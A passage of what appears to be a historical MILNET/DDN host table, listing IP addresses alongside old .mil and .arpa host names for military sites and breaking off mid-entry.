ignet-172d-infbde.arpa 26.4.0.28 richardson-perddims.army.mil perddims43.arpa 26.9.0.28 elmendrf-am1.af.mil elmendrf-am1.arpa 26.10.0.28 elmendorf-piv-2.af.mil elmendorf-piv-2.arpa 26.11.0.28 richards-tcaccis.army.mil 26.14.0.28 decco-ak.arpa 26.15.0.28 altos1.af.mil altos1.arpa 26.0.0.29 aberdeen.mt.ddn.mil brl-mil-tac.arpa 26.1.0.29 apg-emh1.apg.army.mil apg-1.apg.army.mil apg-1.arpa 26.2.0.29 brl.arpa brl.mil 26.4.0.29 dis.dla.mil dis.arpa 26.6.0.29 apg-emh2.army.mil apg-2.arpa 26.7.0.29 csta-1.apg.army.mil csta-one.arpa 26.9.0.29 apg-perddims.army.mil perddims38.arpa 26.14.0.29 aberdeen-ignet2.army.mil 26.20.0.29 apg-emh3.apg.army.mil apg-3.apg.army.mil apg-3.arpa 26.21.0.29 apg-emh4.apg.army.mil apg-4.apg.army.mil apg-4.arpa 26.22.0.29 apg-emh7.army.mil ilcn-apg.arpa 26.0.0.30 brooks.mt.ddn.mil brooks-mil-tac.arpa 26.1.0.30 afmpc-2.af.mil afmpc-2.arpa 26.2.0.30 sam-housto-mil80.army.mil mil-80-5bde.arpa 26.11.0.30 tisg-6.af.mil tisg-6.arpa 26.12.0.30 hqhsd.brooks.af.mil bafb-ddnvax.arpa 26.13.0.30 ed-san-ant.af.mil ed-san-ant.arpa 26.4.0.31 sds-norflka.arpa sds-norflka.navy.mil 26.6.0.31 monroe-tdss.army.mil 26.7.0.31 netpmsa-norfolk1.dca.mil netpmsa-norfolk1.arpa 26.8.0.31 nardacva.arpa 26.9.0.31 pera-asc.arpa 26.10.0.31 idanf.arpa 26.11.0.31 spawar08.arpa 26.12.0.31 seacenlant-portsmth.navy.mil 26.13.0.31 nohimsmidlant.arpa 26.14.0.31 qedvb.arpa 26.16.0.31 navmeducacda.arpa 26.17.0.31 cinclant-norfolk.navy.mil 26.18.0.31 ftmonroe-ignet2.army.mil monroe-ignet2.army.mil 26.24.0.31 norndc.navy.mil norndc.arpa 26.25.0.31 comnavairlant.navy.mil 26.26.0.31 sub-force.navy.mil 26.27.0.31 subship-portsmouth.navy.mil 26.0.0.32 greeley.mt.ddn.mil greely-mil-tac.arpa 26.5.0.32 ftgreely-adacs.army.mil 26.2.0.33 monterey.mt.ddn.mil nps-mil-tac.arpa 26.5.0.33 monterey-perddims.army.mil perddims36.arpa 26.6.0.33 cs.nps.navy.mil nps-cs.arpa 131.120.1.10 cs.nps.navy.mil nps-cs.arpa 26.7.0.33 monterey-asbn.army.mil 26.20.0.33 cc.nps.navy.mil nps.arpa 26.0.0.34 lbl-gw.arpa 26.4.0.34 san-franci-mil80.army.mil mil-80-6bde.arpa 26.6.0.34 mare-island-shipyd.navy.mil 26.10.0.34 vallejo1.arpa 26.11.0.34 netpmsa-vallej01.arpa terpss-vallej01.arpa 26.12.0.34 netpmsa-vallejo2.arpa terpss-vallejo2.arpa 26.13.0.34 netpmsa-vallejo3.arpa 26.0.0.35 sandiego2.mt.ddn.mil san-diego-mil-tac.arpa 26.1.0.35 nosc-tecr.arpa tecr.arpa tecr.nosc.mil 26.2.0.35 nosc-secure2.arpa 26.3.0.35 nosc-secure3.arpa 26.5.0.35 ntsc-pac.arpa vaxpac.arpa 26.6.0.35 nardac-sandiego.arpa 26.8.0.35 netpmsa-sandiego1.arpa 26.9.0.35 netpmsa-sandiego2.navy.mil 26.10.0.35 moccw.navy.mil 26.11.0.35 sndndc.arpa 26.12.0.35 sndndc.arpa 26.14.0.35 corona-pad4.arpa 26.15.0.35 nuwes-sd.navy.mil 26.16.0.35 bendix-sd.arpa 26.18.0.35 seacenpac-sandiego.navy.mil 26.1.0.36 hawaii-emh.pacom.mil hawaii-emh.arpa 26.3.0.36 smith.mt.ddn.mil hawaii2-mil-tac.arpa 26.5.0.36 nstcpvax.arpa ieln-ntecph.arpa 26.6.0.36 honolulu.army.mil perddims45.arpa 26.11.0.36 netpmsa-pearl1.arpa 26.1.0.37 atlanta-asims.army.mil asims-rdca1.arpa 26.2.0.37 mcpherson.mt.ddn.mil mcpherson-mil-tac.arpa 26.3.0.37 ftgillem-darms2.army.mil gillem-darms.army.mil 26.5.0.37 mcpherson-darms2.army.mil darms-2.arpa 26.6.0.37 mcpherson-darms1.army.mil darms-1.arpa 26.7.0.37 gordon-perddims.army.mil perddims32.arpa 26.9.0.37 columbia-aim1.af.mil columbia-aim1.arpa 26.11.0.37 soraaa.army.mil soraaa.arpa 26.13.0.37 gordon-jacs6360.army.mil gordon-jacs.army.mil 26.14.0.37 shaw-piv-1.af.mil shaw-piv-1.arpa 26.0.0.38 great-lakes.mt.ddn.mil greatlakes-mil-tac.arpa 26.5.0.38 dlsc1.arpa 26.14.0.115 dlsc1.arpa 26.6.0.38 drms.arpa comtenc.arpa 26.6.0.115 drms.arpa comtenc.arpa 26.7.0.38 dlsc2.arpa 26.7.0.115 dlsc2.arpa 26.9.0.38 netpmsa-gtlakes1.arpa 26.10.0.38 netpmsa-gtlakes2.arpa 26.11.0.38 netpmsa-gtlakes3.arpa 26.13.0.38 kisawyer-am1.af.mil kisawyer-am1.arpa 26.14.0.38 sheridan-asims2.army.mil 26.15.0.38 kisawyer-piv-1.af.mil kisawyer-piv-1.arpa 26.16.0.38 navmeducaglakes.arpa 26.29.0.38 sds-glakesa.arpa sds-glakesa.navy.mil 26.0.0.39 edwards.mt.ddn.mil edwards-mil-tac.arpa 26.1.0.39 edwards-2060.af.mil edwards-2060.arpa 26.2.0.39 edwards-vax.af.mil edwards-vax.arpa 26.6.0.39 mtf-edwards.af.mil mtf-edwards.arpa 26.7.0.39 george-piv-1.af.mil george-piv-1.arpa 26.8.0.39 norton-piv-1.af.mil norton-piv-1.arpa 26.9.0.39 edwards-piv-1.af.mil edwards-piv-1.arpa 26.11.0.39 edwards-am1.af.mil edwards-am1.arpa 26.13.0.39 edwards-argus.af.mil edwards-argus.arpa 26.14.0.39 asims-047.arpa 26.15.0.39 edwards-saftd-2.af.mil 26.0.0.40 cambridge.mt.ddn.mil bbn-mil-tac.arpa 26.3.0.40 ccz.bbn.com 26.4.0.40 supship-boston.navy.mil supship-boston.arpa 26.8.0.40 plattsburgh-piv-1.af.mil plattsburgh-piv-1.arpa 26.9.0.40 gw1.hanscom.af.mil esdvax2.arpa 129.53.0.101 gw1.hanscom.af.mil esdvax2.arpa 26.10.0.40 navmedcl-portsmouth.arpa 26.11.0.40 westover-piv-1.af.mil westover-piv-1.arpa 26.14.0.40 pease-piv-1.af.mil 26.16.0.40 ftdevens-meprs.army.mil 26.17.0.40 boston-dmins.dla.mil 26.29.0.40 nocws.dca.mil 26.0.0.41 redstone.mt.ddn.mil redstone-mil-tac.arpa 26.1.0.41 redstone-emh3.army.mil micom-test.arpa 26.2.0.41 redstone-emh4.army.mil usarec-2.arpa 26.3.0.41 milneth.ornl.gov ornl-msr.arpa 26.4.0.41 campbell-perddims.army.mil perddims14.arpa 26.5.0.41 bdmsc-hunt.arpa 26.6.0.41 redstone-perddims.army.mil perddims30.arpa 26.7.0.41 netpmsa-milln1.arpa 26.8.0.41 ncpds-oakridge9.arpa 26.9.0.41 redstone-ato.arpa 26.10.0.41 ncpds-oakridge8.arpa 26.11.0.41 mtf-montgomery.af.mil mtf-montgomery.arpa 26.8.0.79 mtf-montgomery.af.mil mtf-montgomery.arpa 26.12.0.41 idamfs.arpa 26.13.0.41 columbus-aim1.af.mil columbus-aim1.arpa 26.14.0.41 aedc-vax.af.mil 26.15.0.41 dsreds.arpa 26.16.0.41 camnet-arnold-r01.af.mil camnet-arnold-r01.arpa 26.17.0.41 redstone-meprs.army.mil 26.24.0.41 redstone-ignet.army.mil 26.25.0.41 redstone-emh2.army.mil micom.arpa 26.14.0.209 redstone-emh2.army.mil micom.arpa 26.26.0.41 redstone-emh1.army.mil mic01.arpa 26.7.0.209 redstone-emh1.army.mil mic01.arpa 26.0.0.42 ramstein2.mt.ddn.mil ramstein2-mil-tac.arpa 26.3.0.42 ramstein2-emh.af.mil ramstein2-emh.arpa ram-emc.arpa 26.7.0.42 ram-esims.af.mil ram-esims.arpa 26.8.0.42 ramstein-piv-1.af.mil ramstein-piv-1.arpa 26.9.0.42 lrc-eds.af.mil lrc-eds.arpa 26.10.0.42 ram-eds.af.mil ram-eds.arpa 26.11.0.42 baumholder-emh1.army.mil email-baumholdr.army.mil 26.12.0.42 mtf-ramstein.arpa mtf-ramstein.af.mil 26.14.0.42 mtf-hq.af.mil mtf-hq.arpa 26.15.0.42 ald-gdss.af.mil 26.15.0.15 ald-gdss.af.mil 26.0.0.43 shafter.mt.ddn.mil shaftr-mil-tac.arpa 26.4.0.43 shafter-asims.army.mil asims-045.arpa 26.5.0.43 pod-har.army.mil 26.6.0.43 pepo41.army.mil 26.7.0.43 deers-asmo.navy.mil 26.8.0.43 hawaii-emh1.pacom.mil 26.9.0.43 ftshafter-ignet2.army.mil 26.10.0.43 pod-hon.army.mil 26.8.0.100 pod-hon.army.mil 26.13.0.43 ftshaftr-jacs6358.army.mil 26.16.0.43 tamc-meprs.army.mil 26.18.0.43 pep042.army.mil 26.0.0.44 navmeducaorlando.arpa 26.1.0.44 ntsc-ate.arpa 26.3.0.44 orlando.mt.ddn.mil orlando-mil-tac.arpa 26.4.0.44 orlando-httds.arpa 26.6.0.44 sperry-system-11.dca.mil sperry-system-11.arpa sperry11.arpa 26.9.0.44 ftlauderdale.nswc.navy.mil nswc-fl.arpa 26.10.0.44 sds-orlanda.navy.mil 26.14.0.44 netpmsa-orlan4.arpa 26.15.0.44 netpmsa-orlan4.arpa 26.16.0.44 ntsc-74.navy.mil ntsc-74.arpa 26.17.0.44 ntsc-sef.arpa 26.18.0.44 orlando-emh1.army.mil pmtrade.arpa 26.0.0.45 dovernj.mt.ddn.mil ardec-mil-tac.arpa 26.1.0.45 pica.army.mil ardec.arpa 26.2.0.45 bayonne-tcaccis.army.mil tcaccis-bay.arpa 26.3.0.45 dover-emh1.army.mil pica-qa.arpa qa.pica.army.mil 26.6.0.45 dcrn2.arpa 26.10.0.58 dcrn2.arpa 26.11.0.45 pltsbrgh-am1.af.mil pltsbrgh-am1.arpa 26.13.0.45 drum-asims.army.mil asims-006.arpa 26.17.0.45 gw.pica.army.mil pica.arpa 192.12.8.4 gw.pica.army.mil pica.arpa 129.139.1.4 gw.pica.army.mil pica.arpa 26.20.0.45 dover-emh2.army.mil pica-lca.arpa lca.pica.army.mil 26.2.0.46 port-hueneme.mt.ddn.mil porthueneme-mil-tac.arpa 26.4.0.46 ptmpmt.arpa 26.5.0.46 dsacs08.army.mil dsacs08.arpa 26.6.0.46 navmeducahueneme.arpa 26.17.0.46 vaxb.navy.mil nswses.arpa vaxb.nswses.navy.mil 192.31.106.3 vaxb.navy.mil nswses.arpa vaxb.nswses.navy.mil 26.0.0.47 wrightpat.mt.ddn.mil wpafb-mil-tac.arpa 26.1.0.47 wpafb-afwal.arpa 26.2.0.47 wpafb-jalcf.arpa wpafb-jalcf.af.mil 26.6.0.47 dsac-g1.arpa 26.7.0.47 wpafb-afwp1.af.mil wpafb-afwp1.arpa 26.8.0.47 wright-pat-piv-1.af.mil 26.9.0.47 amis.af.mil amis.arpa 26.12.0.47 c-17igp.af.mil c-17igp.arpa 26.14.0.47 extender.afit.af.mil afitnet.arpa 26.15.0.47 logair-gw.arpa 192.31.226.1 logair-gw.arpa 26.18.0.47 wpafb-info5.af.mil wpafb-info5.arpa wpafb-info1.af.mil 26.21.0.47 wpafb-fdl.af.mil wpafb-fdl.arpa 26.22.0.47 lognet2.af.mil lognet2.arpa 192.12.64.2 lognet2.af.mil lognet2.arpa 26.0.0.48 kirtland.mt.ddn.mil kirtland-mil-tac.arpa 26.2.0.48 ddnvx2.afwl.af.mil afwl-vax.arpa 129.238.32.36 ddnvx2.afwl.af.mil afwl-vax.arpa 26.4.0.48 dna-field-command.dca.mil dna-field-command.arpa 26.5.0.48 ddnvx1.afwl.af.mil afwl.arpa 129.238.32.2 ddnvx1.afwl.af.mil afwl.arpa 26.6.0.48 dna-cafrms.arpa 26.7.0.48 kirtland-piv-rjets.af.mil kirtland-piv-rjets.arpa 26.9.0.48 hqafosp.af.mil hqafosp.arpa 26.11.0.48 afotec2.af.mil afotec2.arpa 26.14.0.48 cannon-piv-1.af.mil cannon-piv-1.arpa 26.0.0.49 ddn3.dca.mil ddn3.arpa 26.5.0.49 ncpds-argentia.arpa 26.6.0.49 devens-emh1.army.mil usaisd-aims.arpa 26.9.0.49 mtf-pease.af.mil mtf-pease.arpa 26.11.0.49 devens-asims.army.mil asims-022.arpa 26.12.0.49 loring-piv-1.af.mil loring-piv-1.arpa 26.14.0.49 submept.navy.mil submepp.arpa 26.0.0.50 alexandria.mt.ddn.mil darcom-mil-tac.arpa 26.1.0.50 alexandria-emh2.army.mil ari-hq1.arpa 26.2.0.50 alexandria-emh1.army.mil amc-hq.arpa 26.3.0.50 alexandria-emh3.army.mil pyramid-amc.arpa 26.4.0.50 alexandria-mil80.army.mil mil-80-per1.arpa 26.5.0.50 cafrms.arpa 26.6.0.50 washington-asims.army.mil asims-rdcw1.arpa 26.7.0.50 asims-dpcb1.arpa 26.10.0.50 moc120.arpa 26.11.0.50 radmis-onr.arpa 26.14.0.50 fmpmis.navy.mil 26.20.0.50 alexandria-emh4.army.mil usadhq2.arpa 26.21.0.50 etl.army.mil etl.arpa 26.22.0.50 alexandria-emh5.army.mil amc-4.arpa 26.0.0.51 randolph2.mt.ddn.mil randolph2-mil-tac.arpa 26.4.0.51 randolph-piv-1.af.mil randolph-piv-1.arpa 26.6.0.51 san-antonio-piv-2.af.mil 26.7.0.51 afmpc1.af.mil afmpc1.arpa 26.8.0.51 afmpc3.af.mil afmpc3.arpa 26.10.0.51 mtf-kelly.af.mil mtf-kelly.arpa 26.11.0.51 ddp1.af.mil ddp1.arpa 26.13.0.51 randolph-piv-3.af.mil randolph-piv-3.arpa 26.0.0.52 randolph3.mt.ddn.mil randolph3-mil-tac.arpa 26.4.0.52 camnet-randolph-r01.af.mil camnet-randolph-r01.arpa 26.5.0.52 sam-housto-darms.army.mil darms-7.arpa 26.8.0.52 san-antonio-piv-1.af.mil san-antonio-piv-1.arpa 26.11.0.52 randolph2-pc3.af.mil randolph2-pc3.arpa 26.12.0.52 mtf-bergstrom.af.mil mtf-bergstrom.arpa 26.15.0.52 afmpc-10.af.mil afmpc-10.arpa 26.16.0.52 randolph-pc3.af.mil randolph-pc3.arpa 26.17.0.52 bergstrm-am1.af.mil bergstrm-am1.arpa 26.0.0.53 uv6.eglin.af.mil afsc-ad.arpa 26.3.0.53 eglin.mt.ddn.mil afsc-ad-mil-tac.arpa 26.5.0.53 tyndall-am1.af.mil 26.6.0.53 uv4.eglin.af.mil eglin-vax.arpa 26.9.0.53 ntsc-pen.arpa 26.10.0.53 netpmsa-pens1.arpa 26.13.0.53 penndc.navy.mil penndc.arpa 26.5.0.158 penndc.navy.mil penndc.arpa 26.14.0.53 hrlbrtfd-am1.af.mil hrlbrtfd-am1.arpa camnet-hurl-r01.arpa 26.15.0.53 camnet-hurl-r02.af.mil camnet-hurl-r02.arpa 26.16.0.53 eglin-am1.af.mil eglin-am1.arpa 26.18.0.53 wims-tyn1.af.mil wims-tyn1.arpa 26.0.0.54 detrick.mt.ddn.mil detrick-mil-tac.arpa 26.1.0.54 ilcn-detrick.arpa 26.2.0.54 ritchie-perddims.army.mil perddims34.arpa 26.5.0.54 detrick-emh1.army.mil 26.6.0.54 detrick-hsc.army.mil hsc-detrick1.arpa 26.7.0.54 letterkenn-emh1.army.mil lead-1.arpa 26.11.0.54 detrick-hsc2.army.mil hsc-detrick2.arpa 26.13.0.54 mipca.navy.mil pad.arpa 26.14.0.54 alexandria-onet.army.mil absalex-emh.army.mil abs-alex.arpa 26.3.0.55 sheridan-mil801.army.mil mil-80-sher1.arpa 26.4.0.55 sheridan-mil802.army.mil mil-80-sher56.arpa 26.7.0.55 sperblomn.dca.mil sperblomn.arpa 26.10.0.55 dcri.arpa 26.8.0.38 dcri.arpa 26.11.0.55 xenurus.gould.com 26.13.0.55 crane-emh1.army.mil caaa.arpa 26.14.0.55 indinpls.navy.mil 26.16.0.55 wurtsmith-piv-1.af.mil wurtsmith-piv-1.arpa 26.29.0.55 mcs.anl.gov anl-mcs.arpa 26.0.0.57 dockmaster.ncsc.mil dockmaster.dca.mil dockmaster.arpa 26.4.0.58 hanscom-piv-1.af.mil hanscom-piv-1.arpa 26.8.0.58 wva-emh1.army.mil wva-1.arpa 26.15.0.58 supshipbrooklyn.arpa 26.0.0.59 scott.mt.ddn.mil scott-mil-tac.arpa 26.6.0.59 macisin-ii.af.mil macisin-ii.arpa 26.13.0.59 hqmac-gdss.af.mil hqmac-gdss.arpa 26.14.0.59 macisin-i.af.mil macisin-i.arpa 26.15.0.59 acfp-dev.af.mil 26.0.0.60 monmouth.mt.ddn.mil monmouth-mil-tac.arpa 26.1.0.60 cecom-2.arpa monmouth-emh2.army.mil 26.7.0.60 monmouth-perddims.army.mil perddims28.arpa 26.8.0.60 dix-perddims.army.mil perddims26.arpa 26.9.0.60 ftmonmth-meprs.army.mil 26.10.0.60 bayonne-autostrad.army.mil autostrad-bay.arpa 26.14.0.58 bayonne-autostrad.army.mil autostrad-bay.arpa 26.14.0.60 navwepstaearle.arpa 26.15.0.60 mcguire-piv-2.af.mil mcguire-piv-2.arpa 26.16.0.60 dover-piv-2.af.mil dover-piv-2.arpa 26.17.0.60 monmouth-emh1.army.mil networks.arpa 26.24.0.60 cecom-3.arpa monmouth-emh3.army.mil 26.0.0.61 saint-louis.mt.ddn.mil stlouis-mil-tac.arpa 26.3.0.61 st-louis-emh3.army.mil avscom.arpa 26.5.0.61 dmaac.dma.mil dmaacgad.arpa 26.7.0.61 st-louis-avnmam.army.mil dasp75.arpa 26.9.0.61 stlouis-ignet.army.mil st-louis-ignet.army.mil 26.10.0.61 whiteman-piv-1.af.mil whiteman-piv-1.arpa 26.15.0.61 stlouis-ignet2.army.mil st-louis-ignet2.army.mil 26.16.0.61 simastl.army.mil 192.35.148.1 simastl.army.mil 26.19.0.61 st-louis-emh4.army.mil stl4.arpa 26.0.0.62 roberts.mt.ddn.mil roberts-mil-tac.arpa 26.2.0.62 navmeducalemoore.arpa 26.6.0.62 vandenberg-am1.af.mil vandenberg-am1.arpa 26.8.0.62 lemnaf.navy.mil lemnaf.arpa 26.6.0.135 lemnaf.navy.mil lemnaf.arpa 26.17.0.62 roberts-emh1.army.mil 26.0.0.63 el-segundo2.mt.ddn.mil elsegundo-mil-tac.arpa 26.4.0.63 afsc-sdx.af.mil afsc-sdx.arpa 26.5.0.63 navmeducalongbeach.arpa 26.6.0.63 dava1.af.mil dava1.arpa 26.7.0.63 lbnsy.arpa 192.41.202.2 lbnsy.arpa 26.9.0.63 jpl-gdss.af.mil jpl-gdss.arpa 26.10.0.63 la-pacdpinet.army.mil 26.11.0.63 mtf-mather.af.mil 26.12.0.63 navshipyd-longbeach.arpa 26.13.0.63 supship-long-beach.arpa 26.15.0.63 van-nuys-dmins.dla.mil 26.16.0.63 elsegundo-dmins.dla.mil 26.24.0.63 losalmts-darms.army.mil 26.0.0.64 robins.mt.ddn.mil robins-mil-tac.arpa 26.4.0.64 ftmcpherson-ignet.army.mil forscom-ignet.army.mil igmirs-forscom .arpa 26.8.0.64 gillem-mil80.army.mil mil-80-2bde.arpa 26.9.0.64 wr-hits.af.mil wr-hits.arpa 26.10.0.64 snag-wr.af.mil snag-wr.arpa 26.12.0.64 ftgillm-ignet.army.mil igmirs-ftgillm.army.mil igmirs-ftgillm.ar pa 26.13.0.64 robinsmdss.af.mil robinsmdss.arpa 26.16.0.64 robins-piv-1.af.mil 26.0.0.65 el-segundo.mt.ddn.mil elsegundo2-mil-tac.arpa 26.2.0.65 aerospace.aero.org aero.org 192.5.9.3 aerospace.aero.org aero.org 130.221.192.10 aerospace.aero.org aero.org 26.4.0.65 jpl-milvax.arpa 128.1.13.0 jpl-milvax.arpa 26.11.0.65 dcrl.dla.mil dcrl.arpa 26.14.0.230 dcrl.dla.mil dcrl.arpa 26.30.0.65 afsc-ssd.af.mil afsc-sd.af.mil 26.1.0.66 afgl.arpa 26.2.0.66 hanscom.mt.ddn.mil afgl-mil-tac.arpa 26.6.0.66 eastlonex.radc.af.mil radc-eastlonex.arpa 26.7.0.66 gtewis.af.mil gtewis.arpa 26.8.0.66 gw2.hanscom.af.mil esdvax.arpa 26.13.0.66 afgl-vax.af.mil afgl-vax.arpa 26.14.0.66 drcvax.af.mil drcvax.arpa 26.15.0.66 hanscom-am1.af.mil hanscom-am1.arpa 26.19.0.66 supship-bath.navy.mil supship-bath.arpa 26.0.0.67 andrews.mt.ddn.mil afsc-hq-mil-tac.arpa 26.1.0.67 afsc-hq.arpa afsc-hq.af.mil 26.2.0.67 hqafsc-vax.af.mil hqafsc-vax.arpa 26.7.0.67 mqg.dca.mil mqg.arpa 26.9.0.67 indianhead.nswc.navy.mil nswc-ih.arpa 26.10.0.67 ftmeade-darms.army.mil meade-darms.army.mil darms-4.arpa 26.11.0.67 navsea-331.navy.mil 26.12.0.67 alexandria-ignet1.army.mil igmirs-cidc.army.mil igmirs-cidc.arpa 26.14.0.67 hqafsc-lons.af.mil 26.15.0.67 alexandria-ignet.army.mil igmirs-darcom.arpa 26.16.0.67 navsea-pms313.navy.mil 26.17.0.67 andrews-piv-1.af.mil andrews-piv-1.arpa 26.0.0.69 abrams2.mt.ddn.mil abrams2-mil-tac.arpa 26.4.0.69 frankfurt-asims.army.mil fra-asims.arpa 26.7.0.69 hanau-emh1.army.mil email-hanau.army.mil 26.8.0.69 aschaffenb-emh1.army.mil 26.10.0.69 frankfurt-ignet2.army.mil fra-ignet.army.mil 26.12.0.69 dar-ignet.army.mil 26.14.0.69 euraaa.army.mil 26.0.0.70 cmsc.dca.mil cmsc.arpa 26.3.0.70 dcaoc2.mt.ddn.mil dcaoc2-mil-tac.arpa 26.6.0.70 washngtn-meprs.army.mil 26.7.0.70 anacostia-onet.navy.mil 26.8.0.70 navyyard-onet.navy.mil 26.19.0.70 ddntrouble.dca.mil ddntrouble.arpa 26.0.0.71 okc-unix.arpa 26.1.0.71 ftsill-ignet.army.mil sill-ignet.army.mil igmirs-sill-ig.arpa 26.2.0.71 tinker.mt.ddn.mil tinker-mil-tac.arpa 26.3.0.71 satods.arpa 26.4.0.71 tinkermdss.af.mil tinkermdss.arpa 26.6.0.71 ccso-vax.af.mil ccso-vax.arpa 131.18.3.1 ccso-vax.af.mil ccso-vax.arpa 26.10.0.71 oc1.af.mil oc1.arpa 26.12.0.71 ocdis01.af.mil 26.14.0.71 aflc-oc-aisg1.af.mil 26.16.0.71 apsd-ii-os062.af.mil apsd-ii-os062.arpa 26.17.0.71 tinker-piv-1.af.mil tinker-piv-1.arpa 26.24.0.71 chaffe-tcaccis.army.mil 26.0.0.72 ddn-shadow-mc.dca.mil ddn-shadow-mc.arpa 26.1.0.72 ilcn-natick.arpa 26.2.0.72 ddn2.dca.mil ddn.dca.mil ddn2.arpa ddn.arpa 26.5.0.72 inmet.inmet.com inmet.com ddnt.arpa 26.6.0.72 devens-perddims.army.mil perddims19.arpa 26.7.0.72 watertown-emh1.army.mil 26.8.0.72 x25test.dca.mil x25test.arpa 26.9.0.72 dcrb2.arpa 26.7.0.58 dcrb2.arpa 26.11.0.72 nsyptsmh-poe.arpa nsyportsmouth.arpa nysportsmouth.arpa 192.26.20.2 nsyptsmh-poe.arpa nsyportsmouth.arpa nysportsmouth.arpa 26.12.0.72 loring-am1.af.mil loring-am1.arpa 26.14.0.72 pease-am1.af.mil pease-am1.arpa 26.15.0.72 natick-emh1.army.mil natick1.arpa 26.0.0.73 sri-nic.arpa nic.ddn.mil 10.0.0.51 sri-nic.arpa nic.ddn.mil 26.3.0.73 menlo-park.mt.ddn.mil sri-mil-tac.arpa 26.5.0.73 twg.com twg.arpa 26.0.0.74 white-sands.mt.ddn.mil whitesands-mil-tac.arpa 26.2.0.74 wsmr-simtel20.army.mil simtel20.arpa simtel20.army.mil 26.4.0.74 ftbliss-ignet.army.mil bliss-ignet.army.mil igmirs-ftbliss.arpa 26.6.0.74 holloman-am1.af.mil holloman-am1.arpa 26.8.0.74 bliss-perddims.army.mil perddims02.arpa 26.11.0.74 wsmr-emh99.army.mil traps-wsmr.arpa 26.13.0.74 bliss-ato.army.mil bliss-ato.arpa 26.0.0.75 yuma.mt.ddn.mil yuma-mil-tac.arpa 26.5.0.75 luke-piv-3.af.mil luke-piv-3.arpa 26.8.0.75 nellis-piv-1.af.mil nellis-piv-1.arpa 26.10.0.75 mtf-nellis.af.mil mtf-nellis.arpa 26.1.0.76 dca-ems.dca.mil dca-ems.arpa dcems.arpa 26.3.0.76 dcaoc.mt.ddn.mil dcaoc-mil-tac.arpa 26.4.0.76 deers-alexandria.arpa 26.5.0.76 oahost.dca.mil oahost.arpa 26.6.0.76 belvoir-ignet2.army.mil igmirs-corpeng.arpa 26.10.0.76 pentagon-bcn.army.mil pentagon-bcn.arpa 192.31.75.235 pentagon-bcn.army.mil pentagon-bcn.arpa 26.17.0.76 conus-milnetmc.dca.mil conus-milnetmc.arpa 26.0.0.76 conus-milnetmc.dca.mil conus-milnetmc.arpa 26.2.0.77 zama.mt.ddn.mil zama-mil-tac.arpa 26.4.0.77 zama-ignet.army.mil ignet-cpzama.arpa 26.6.0.77 yokota-piv-1.af.mil yokota-piv-1.arpa 26.7.0.77 misawa-piv-1.af.mil misawa-piv-1.arpa 26.11.0.77 zama-pacdpine.army.mil pacdpinet-zama.arpa 26.13.0.77 mtf-misawa.arpa mtf-misawa.af.mil 26.14.0.77 ncpds-iwakuni.arpa 26.15.0.77 nsdyok.arpa yoknsd.arpa 26.10.0.77 nsdyok.arpa yoknsd.arpa 26.16.0.77 ida-fms-yokosuka.arpa 26.17.0.77 poj-har.army.mil poj-har.arpa 26.18.0.77 zama-emh1.army.mil 26.19.0.77 cpzama-jacs6350.army.mil 26.1.0.78 puget-sound.mt.ddn.mil pugetsound-mil-tac.arpa 26.5.0.78 peracv.navy.mil peracv.arpa 26.6.0.78 navhospbrem.arpa 26.7.0.78 navmeducabremerton.arpa 26.8.0.78 navmeducaoakharbor.arpa 26.15.0.78 lewis-asims.army.mil asims-020.arpa 26.0.0.79 benning.mt.ddn.mil benning-mil-tac.arpa 26.4.0.79 benning-ato.arpa 26.6.0.79 benning.army.mil 26.7.0.79 benning-tcaccis.army.mil 26.10.0.79 mcdn-alb.arpa 26.11.0.79 mtf-maxwell.af.mil mtf-maxwell.arpa 26.13.0.79 benning-jacs5074.army.mil jacs5074.arpa 26.14.0.79 columbus-am1.af.mil columbus-am1.arpa 26.15.0.79 camnet-columbus-r02.af.mil camnet-columbus-r02.arpa 26.16.0.79 gunter-am1.af.mil gunter-am1.arpa camnet-gunt-r01.arpa 26.18.0.79 benning-perddims.army.mil perddims33.arpa 26.19.0.79 benning-meprs.army.mil 26.24.0.79 ftgillem-darms.army.mil 26.25.0.79 ftmcphsn-jacs5073.army.mil 26.31.0.79 benning-asims.army.mil asims-034.arpa 26.0.0.80 bragg.mt.ddn.mil bragg-mil-tac.arpa 26.4.0.80 tecnet-clemson.arpa tecnet-clemson.jcte.jcs.mil 26.5.0.80 nardac-cherrypt.arpa 26.6.0.80 chrnsc.arpa 26.9.0.80 chrnsc.arpa 26.7.0.80 ed-mb.af.mil ed-mb.arpa 26.8.0.80 netpmsa-charl3.arpa 26.10.0.80 ftbragg-asatms.army.mil bragg-asatms.army.mil 26.11.0.80 navmeducacharleston.arpa 26.12.0.80 mcdn-clb3.arpa 26.13.0.80 bragg-asims.army.mil 26.14.0.80 jackson-jacs5056.army.mil jackson-jacs.army.mil 26.15.0.80 cptmas.arpa 26.16.0.80 navmeducalejeune.arpa 26.17.0.80 navmeducacherrypt.arpa 26.18.0.80 bragg-jacs5072.army.mil bragg-jacs.army.mil 26.19.0.80 ftbragg-ignet.army.mil bragg-ignet.army.mil 26.24.0.80 pope-piv-1.af.mil pope-piv-1.arpa 26.25.0.80 ftbragg-ignet2.army.mil bragg-ignet2.army.mil 26.26.0.80 ftbragg-ignet3.army.mil bragg-ignet3.army.mil 26.30.0.80 bragg-emh1.army.mil bragg.arpa 26.31.0.80 bragg-perddims.army.mil perddims10.arpa 26.0.0.81 carderock.mt.ddn.mil david-mil-tac.arpa 26.3.0.81 dtrc.dt.navy.mil dtrc.arpa 130.46.1.3 dtrc.dt.navy.mil dtrc.arpa 26.6.0.81 dmacsc.dma.mil dmaodshost.arpa 26.9.0.81 hqaaa.army.mil hqaaa.arpa 26.11.0.81 nardacdc002.arpa dcmail.arpa 26.20.0.81 wrair-emh1.army.mil ilcn-wreed.arpa wrair.arpa 26.2.0.82 buckner.mt.ddn.mil buckner-mil-tac.arpa 26.5.0.82 navmeducaokinawa.arpa 26.6.0.82 ncpds-butler.arpa 26.7.0.82 kadena-piv-1.af.mil kadena-piv-1.arpa 26.8.0.82 kadena-c01.af.mil kadena-c01.arpa 26.9.0.82 kadena-c02.af.mil kadena-c02.arpa 26.10.0.82 mtf-kadena.af.mil mtf-kadena.arpa 26.12.0.82 kadena-am2.af.mil kadena-am2.arpa 26.13.0.82 sac-misc3.af.mil sac-misc3.arpa 26.18.0.82 buckner-emh1.army.mil 26.0.0.83 robins2.mt.ddn.mil robins2-mil-tac.arpa 26.5.0.83 wr1.af.mil wr1.arpa 26.6.0.83 wrdis01.af.mil 26.7.0.83 edcars-wr.af.mil edcars-wr.arpa 26.8.0.83 aflc-wr-aisg1.af.mil aflc-wr-aisg1.arpa 26.9.0.83 